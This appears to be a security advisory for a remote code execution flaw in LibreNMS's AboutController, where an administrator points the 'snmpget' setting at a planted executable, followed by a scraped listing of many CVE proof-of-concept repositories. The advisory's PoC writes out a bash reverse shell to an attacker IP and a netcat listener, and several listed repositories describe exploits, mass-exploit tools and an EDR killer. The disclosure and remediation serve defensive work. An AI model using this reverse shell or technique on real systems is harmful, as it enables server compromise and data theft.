# Remote Code Execution via AboutController in LibreNMS ## Summary A Remote Code Execution (RCE) vulnerability exists in LibreNMS 26.3.1 through the AboutController. An authenticated administrator can manipulate the `snmpget` configuration parameter to execute arbitrary system commands. When the `/about` endpoint is accessed, the application executes the configured binary path via `shell_exec()` without proper validation. This vulnerability leads to complete server compromise, allowing attackers to establish reverse shells, exfiltrate sensitive data, and maintain persistent access. **Severity:** High (CVSS 7.2) **Attack Vector:** Network **Privileges Required:** High (Administrator) **User Interaction:** None **Impact:** Complete system compromise with web server privileges --- ## Details ### Vulnerable Code **File:** `app/Http/Controllers/AboutController.php` **Line:** 85 ```php 'version_netsnmp' => str_replace('version: ', '', rtrim(shell_exec(LibrenmsConfig::get('snmpget', 'snmpget') . ' -V 2>&1'))), ``` ### Root Cause The AboutController retrieves the `snmpget` configuration value from the database and directly concatenates it into a `shell_exec()` call without proper validation or escaping. While the `sanitizePath()` function attempts to validate executable paths by blocking special characters (`;`, `` ` ``, `#`, `$`, `|`, `&`, `'`, `"`, `>`, `<`, `(`), it only prevents direct command injection. It does NOT prevent an attacker from pointing the configuration to a malicious executable file already present on the system. ### Configuration Access The `snmpget` configuration can be modified through the web interface: - **Endpoint:** `PUT /settings/snmpget` - **Controller:** `SettingsController::update()` - **Required Privileges:** Administrator - **Config Definition:** `resources/definitions/config_definitions.json` ```json "snmpget": { "default": "/usr/bin/snmpget", "type": "executable" } ``` ### Validation Analysis The `sanitizePath()` function in `DynamicConfigItem.php`: ```php // LibreNMS/Util/DynamicConfigItem.php:277-284 private function sanitizePath(string $path): string|false { if (preg_match('/[`;#$|&\'"><(]/', $path)) { return false; } return realpath($path); } // LibreNMS/Util/DynamicConfigItem.php:107-110 } elseif ($this->type === 'executable') { $value == $this->sanitizePath($value); return $value !== false && is_file($value) && is_executable($value); } ``` ### Attack Scenarios | Scenario | Description | |----------|-------------| | **Insider Threat** | Internal admin creates malicious file → updates config → RCE | | **Privilege Escalation** | Attacker with limited access → creates file → full RCE | | **Supply Chain** | Malicious package installs binary → admin uses it → RCE | --- ## PoC ### Prerequisites - Valid administrator credentials for LibreNMS web interface - Ability to create a file on the target system (via prior access, SSH, or another vulnerability) ### Proof of Concept - Reverse Shell #### Step 1: Create Malicious Executable Create a reverse shell payload that connects back to the attacker: ```bash ATTACKER_IP="172.16.69.144" ATTACKER_PORT=9001 bash -c 'bash -i >& /dev/tcp/'$ATTACKER_IP'/'$ATTACKER_PORT' 0>&1' 2>/dev/null ``` Save this as `/tmp/rev_shell.sh` and make it executable: ```bash chmod +x /tmp/rev_shell.sh ``` #### Step 2: Setup Netcat Listener On your attacking machine, start a netcat listener: ```bash nc -lvnp 9001 ``` #### Step 3: Update Configuration via Web Interface Login to LibreNMS web interface as administrator and navigate to: - **Settings** → **External** → **Binaries** - Locate **snmpget** configuration - Update the value to: `/tmp/rev_shell.sh` - Click **Save** <img width="1919" height="848" alt="image" src="https://github.com/user-attachments/assets/f4f78425-396e-4dc3-a11f-a33f0f6f7fa3" /> #### Step 4: Trigger RCE Access the `/about` endpoint to execute the malicious binary: <img width="1861" height="957" alt="image" src="https://github.com/user-attachments/assets/4d3da8b9-1ec4-4703-bede-9e485e45726b" /> --- ## Impact Summary | Category | Level | Description | |----------|-------|-------------| | **Confidentiality** | HIGH | Read config files, database credentials, SSH keys | | **Integrity** | HIGH | Create webshells, backdoors, modify code | | **Availability** | HIGH | Disrupt services, delete data, stop monitoring | | **Scope** | CHANGED | Compromise extends beyond application to system | ### Who Is Impacted - LibreNMS installations where attacker has admin credentials AND file system access - Organizations using LibreNMS for network monitoring - Systems monitored by LibreNMS (lateral movement risk) --- ## Remediation Replace `shell_exec()` with Symfony Process component: ```php // BEFORE (vulnerable): shell_exec(LibrenmsConfig::get('snmpget', 'snmpget') . ' -V 2>&1') // AFTER (safe): $process = new Process([LibrenmsConfig::get('snmpget', 'snmpget'), '-V']); $process->run(); ```
PoC: YellowKey-BitLocker-CVE-2026-45585
YellowKey BitLocker recovery - bitlocker yellowkey, yellowkey bitlocker, CVE-2026-45585, yellowkey github, yellowkey vulnerability, yellowkey CVE, TPM, BitLocker recovery key backup, Windows 10/11, CLI GUI, portable audit tool. Download:🡇
PoC: pixel-ksu-root
adb-driven KernelSU loader for stock Google Pixel: temporary kernel R/W via CVE-2026-43499 (GhostLock), then late-loads a signature-matched kernelsu.ko for the running KMI. Manager-agnostic.
PoC: CVE-2026-19745
Learn how I found my first two CVEs by pure accident.
PoC: cve-2026-23989-opencloud-lab
Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability
poc and yara rules
PoC: CVE-2026-72898
Metabase SQLi
PoC: CVE-2026-19478
GitLab Code injection
PoC: CVE-2026-75604
CVE-2026-75604 (Next.js Windows RCE) PoC - unauthenticated RCE via cache path traversal + forged Server Action; for authorized security testing
PoC: CVE-2026-19632
CVE-2026-19632 - TranslatePress One-Day PoC
PoC: CVE-2026-56705
CVE-2026-56705 - Adminer < 5.4.3 unauthenticated RCE via MSSQL PDO DSN injection (ODBC TraceFile arbitrary file write). PoC, Docker lab and negative test included.
PoC: CVE-2026-75604-poc
CVE-2026-75604 Next.js Windows RCE poc
PoC: CVE-2026-4692-trust-me-im-in-rdm
Firefox BrowsingContext field-sync authz bypass (N-day, bug 2017643): forged PContent::CommitBrowsingContextTransaction sets InRDMPane=true from a compromised content process - parent applies it. Prerequisite primitive for privileged-UI touch-event injection.
PoC: CVE-2022-28906-POC
CVE-2022-28906 Proof of concept in Python3
PoC: CVE-2026-41551
ROS# 路径遍历漏洞(CVE-2026-41551)
PoC: papercut-toolkit
#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained
PoC: PaperCut-CVE-2026-81578-82078
Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078
PoC: vankyo-s30-bootloader-unlock
Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: hdwebmobile-formula-pricing
WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE
PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write
CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.
PoC: CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
PoC: CVE-2026-66384
CVE-2026-66384 - Draft or TODO
PoC: CVE-2026-33017-PoC-Reverse-Shell
CVE-2026-33017 PoC Reverse Shell
PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules
CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules
PoC: CVE-2026-10036-speechbrain-rce
SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.
PoC: CVE-2025-55182-poc
I know you are probably here from Hack the Box, if so, yes this one actually works.
PoC: Project-CVE-2026-50751
IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.
PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine
A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.
PoC: Zimbra-CVE-2026-73570-Rules
Wazuh Rules for Detection Zimbra (CVE-2026-73570).
PoC: CVE-2022-46169
Cacti 1.2.22 unauthenticated command injection
PoC: CVE-2024-23897
Jenkins CVE-2024-23897 — CSRF-crumb aware PoC
PoC: CVE-2025-10952-ml-logger-AFR
PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3
PoC: CVE-2026-65643
CVE-2026-65643 - Draft or TODO
PoC: cve-2023-23397-detection-lab
Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.
PoC: fastjson-cve
fastjson-cve-2026-16723
PoC: CVE-2026-23751-poc
Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)
PoC: CVE-2023-27350-CVE-2023-27351
CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO
PoC: Project-CVE-2026-33017
CVE-2026-33017 - Langflow Unauthenticated RCE Exploit
PoC: CVE-2026-70463
Testing CVE-2026-70463 by Fyyre
PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report
Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.
PoC: CVE-2026-20131-Post-Incident-Written-Report
Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.
PoC: ghostlock-pfem10
GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes
PoC: htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.
PoC: spring-ai-sibling-loop-poc
Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)
PoC: mssharepoint-scanner
A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.
PoC: weblogic
Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)
PoC: CVE-2021-27876-veritas-backup
Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)
PoC: rmg-s9180-fzg1
Root My Galaxy SM-S9180 (dm3q) S9180ZHS8FZG1 payload port - CVE-2026-43499 + KernelSU LKM
PoC: hacktivity-vulns-exploits-lab
Writeup + CVE analysis + countermeasures for the Hacktivity 'Vulnerabilities, Exploits, and Remote Access Payloads' lab (netcat shells, Metasploit, CVE-2010-1240, CVE-2004-2687).
PoC: CVE-2026-55040-Mass-Exploit
CVE-2026-55040
PoC: Project-CVE-2026-75604
A Python-based exploitation framework for CVE-2026-75604 that enables authorized penetration testers to validate Next.js Windows cache traversal vulnerabilities. Deploys reverse shells and webshells via path traversal, with built-in target verification and proxy support for seamless integration into standard pentest workflows.
PoC: CVE-2026-18963
CVE-2026-18963 Keycloak Reset-Credentials State Bypass Detector
PoC: CVE-2015-3246
CVE-2015-3246
PoC: CVE-2015-5287
CVE-2015-5287
PoC: htb-labs-nexus
Hack The Box Nexus machine write-up covering reconnaissance, Gitea credential discovery, Krayin CRM exploitation via CVE-2026-38526, initial access, and privilege escalation through a vulnerable Gitea template synchronization service.
PoC: Cisco-CVE-2026-20303-More
CVE-2026-20303, CVE-2026-20304, CVE-2026-20310, CVE-2026-20312, CVE-2026-20313
PoC: CVE-Ubiquiti
CVE-2026-77542, CVE-2026-77543, CVE-2026-77545, CVE-2026-77550, CVE-2026-77551, CVE-2026-77552, CVE-2026-77553, CVE-2026-77554, CVE-2026-77557 - Draft or TODO
PoC: CVE-2026-18431
CVE-2026-18431 - Draft or TODO
PoC: CVE-2026-8467
CVE-2026-8467 - Draft or TODO
PoC: CVE-2026-50787
Security advisory for CVE-2026-50787: uncontrolled resource consumption in e-SIC Livre CAPTCHA generation leading to remote denial of service.
PoC: solarview-ics-vulnerability-analysis
Threat model and vulnerability analysis of Contec SolarView Compact (CVE-2022-29303)
PoC: CVE-2026-72898-metabase-sqli
Detector + root-cause analysis for CVE-2026-72898 (Metabase unauthenticated SQLi via reset_password)
PoC: By-Poloss..-..CVE-2026-18080
Poc CVE-2026-18080
PoC: CVE-2026-63520
POC pre-auth RCE on Sharepoint chain
PoC: f_hid-4.14-backports
Backports of three published f_hid fixes (incl. CVE-2026-31721, CVE-2026-31606) to an EOL Linux 4.14.190 Android vendor kernel, with on-device verification records.
PoC: chrome-vuln-scanner
Check for CVE-2026-79266. A use-after-free in the DevTools component allows arbitrary code execution inside the sandbox via a malicious Chrome extension leveraging social engineering.
PoC: CVE-2026-19912-CVE-2026-19913-CVE-2026-19914
CVE-2026-19912, CVE-2026-19913, CVE-2026-19914
PoC: CVE-2026-19632-POC
PoC for CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Unauthenticated Account Takeover via Password Reset Link Disclosure
PoC: ghostlock-infinix-hot70
Proof-of-concept kernel exploit for GhostLock (CVE-2026-43499) on the Infinix Hot 70.
PoC: CVE-2025-2945-pgAdmin-RCE
PoC for CVE-2025-2945 — pgAdmin 4 authenticated eval() injection RCE, CVSS 9.9
PoC: CVE-2026-63072
CVE-2026-63072
PoC: CVE-2026-76904
PostGIS SQL Injection GeoTools
PoC: CVE-2014-085
ZooKeeper 未授权访问漏洞(CVE-2014-085)PoC 及靶场
PoC: hdwebmobile-photo-video-reviews
WooCommerce plugin: photo & video product reviews, closing CVE-2026-12684's unauthenticated-upload vulnerability class by construction
PoC: Exploit-CVE-2026-56705
CVE-2026-56705 — Adminer < 5.4.3 Unauthenticated RCE via MSSQL PDO DSN Injection
PoC: CVE-2026-73570
Zimbra SNMP Notification OS Command Injection — Unauthenticated RCE via SMTP exploit (Poc)
PoC: vivo-root-build
vivo/iQOO 提权 so 编译(CVE-2026-43499)
PoC: CVE-2026-72530-TrueConf-Sandbox-Escape-
Este repositorio contiene una demostración educativa de la mitigación y detección para **CVE-2026-72530**, una vulnerabilidad crítica de **Code Injection y Sandbox Escape** en TrueConf Server.
PoC: CVE-2021-41773-Exploit
CVE-2021-41773 Apache HTTP Server 2.4.49 Path Traversal to RCE Exploit
PoC: cve-2026-60004
CVE-2026-60004 es una vulnerabilidad crítica (CVSS 9.8) en Gitea que permite ejecución remota de código sin autenticación mediante el endpoint `/api/v1/repos/{owner}/{repo}/diffpatch`.
PoC: CVE-2026-68820_Mass_Exploit
CVE-2026-68820 — Mass Exploit Framework Edition.
PoC: CVE-2026-58073-check
Safely detect Veeam Service Provider Console auth bypass CVE-2026-58073
PoC: CVE-2026-18963
Nuclei template to discover Keycloak reset-credentials endpoints related to CVE-2026-18963 exposure validation.
PoC: CVE-2020-1472
CVE-2020-1472
PoC: CVE-2026-32635-Angular-XSS-Mitigation-
Demostracion educativa de mitigacion y deteccion de CVE-2026-32635: XSS en atributos i18n de Angular.
PoC: CVE-2018-16763_fuel_cms_exploit
A fuel CMS exploit based on Python for RCE mentioned in CVE-2018-16763.
PoC: CVE-2026-26211
Public disclosure for CVE-2026-26211, a stored XSS vulnerability affecting Ekushey Project Manager CRM v5.0.
PoC: keycloak-CVE-2026-18963
PoC, Dockerfile playground and root cause from patch diff analysis.
PoC: CVE-2026-17532-lab
CVE-2026-17532 Docker Lab.
PoC: Wildfire
CVE-2026-39154, Stored XSS in CometChat JS SDK
PoC: Trespasser
CVE-2026-74970, Fission site isolation bypass in Firefox WebRender
PoC: Palimpsest
CVE-2026-74945, Uninitialized heap disclosure via a crafted web font (sec-high)
PoC: SkeletonKey
CVE-2026-6765, Test only FormAutofill handlers exposed in Firefox
PoC: Revenant
CVE-2026-74943, Use after free in Firefox RasterImage (sec-high)
PoC: CVE-2026-73570
PoC for CVE-2026-73570 (Zimbra SMTP Command Injection)
PoC: EDRKiller
Use cve-2026-36425 killer edr,360 can killer
PoC: RootMyVivo
One-click root for vivo/iQOO devices on locked bootloader | CVE-2026-43499 + KernelSU
PoC: Exploit-For-CVE-2026-18963
Exploit for CVE-2026-18963 by BlackHatExploitation
PoC: gha-lab-aaaaa1cc3e
GitHub Actions workflow sandbox for CVE-2025-67727 reproduction
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free